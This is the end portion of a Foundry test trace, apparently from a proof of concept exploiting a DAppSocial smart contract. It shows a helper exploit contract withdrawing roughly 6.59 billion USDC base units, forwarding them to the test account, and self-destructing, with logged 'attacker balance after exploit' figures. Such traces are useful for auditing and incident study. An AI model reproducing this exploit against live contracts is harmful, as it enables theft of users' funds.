    │   │   │   ├─ [27928] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 6592359286 [6.592e9]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: DAppSocial: [0x319Ec3AD98CF8b12a8BE5719FeC6E0a9bb1ad0D1], to: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 6592359286 [6.592e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x90c3ba2964f1423abc460e2200d27a2a41798af276a5711b1fbb91b07901b562: 0x0000000000000000000000000000000000000000000000000000000188ef6b76 → 0
    │   │   │   │   │   @ 0xd5a3747ee31d3fd63e41cb739b082a09bdc30756b64987e2144484efdf2892c3: 0 → 0x0000000000000000000000000000000000000000000000000000000188ef6b76
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit TokenWithdrawn(param0: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param1: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param2: 6592359286 [6.592e9])
    │   │   ├─  storage changes:
    │   │   │   @ 0x36cff5a2ab9d747279724952977d419e50daa7eab7c912efbd52cff98cde4d16: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0bdc0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffe7701524a
    │   │   └─ ← [Stop]
    │   ├─ [1315] USDC::balanceOf(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [delegatecall]
    │   │   │   └─ ← [Return] 6592359286 [6.592e9]
    │   │   └─ ← [Return] 6592359286 [6.592e9]
    │   ├─ [4817] USDC::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6592359286 [6.592e9])
    │   │   ├─ [4028] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6592359286 [6.592e9]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: HelperExploitContract: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6592359286 [6.592e9])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x00000000000000000000000000000000000000000000000000000000003d0900 → 0x00000000000000000000000000000000000000000000000000000001892c7476
    │   │   │   │   @ 0xd5a3747ee31d3fd63e41cb739b082a09bdc30756b64987e2144484efdf2892c3: 0x0000000000000000000000000000000000000000000000000000000188ef6b76 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [5177] HelperExploitContract::killMe()
    │   └─ ← [SelfDestruct]
    ├─ [1031] USDT::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10339882398 [1.033e10]
    ├─ emit log_named_decimal_uint(key: "Attacker USDT balance after exploit", val: 10339882398 [1.033e10], decimals: 6)
    ├─ [1315] USDC::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DAppTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 6596359286 [6.596e9]
    │   └─ ← [Return] 6596359286 [6.596e9]
    ├─ [1164] USDC::decimals() [staticcall]
    │   ├─ [381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   └─ ← [Return] 6
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC balance after exploit", val: 6596359286 [6.596e9], decimals: 6)
    ├─  storage changes:
    │   @ 31: 1 → 0x00000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f01
    │   @ 0x282eb03f5cbdebec2fe2f0b4c42908bac9be5a205732fd22dde6a0c0d820e564: 0 → 1
    │   @ 0xe63fddd7f8249695b01d1aa3a37dc0c1d4b203c3113ce6f6b10a7cb3b8c38619: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x00000000000000000000000000000000000000000000000000000001892c7476
    │   @ 0x947ab8b7bc43e4de8b04272fbded2ddd548e67f8a06cc1a9ef6e3599f5bd73d9: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   @ 0x282eb03f5cbdebec2fe2f0b4c42908bac9be5a205732fd22dde6a0c0d820e561: 0 → 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac
    │   @ 0x174b1fcc214043897dfbfc97018d4bf29434fce65a1e4a9a69124ace49aee40c: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000000000000000000003d0900
    │   @ 0x2e6a14b3ae86f6af62057881e2f4c3351cd87652c7e63583a47e548fa16f03ac: 0 → 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78
    │   @ 0x2e6a14b3ae86f6af62057881e2f4c3351cd87652c7e63583a47e548fa16f03af: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.26s (7.93s CPU time)

Ran 2 test suites in 10.39s (9.80s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
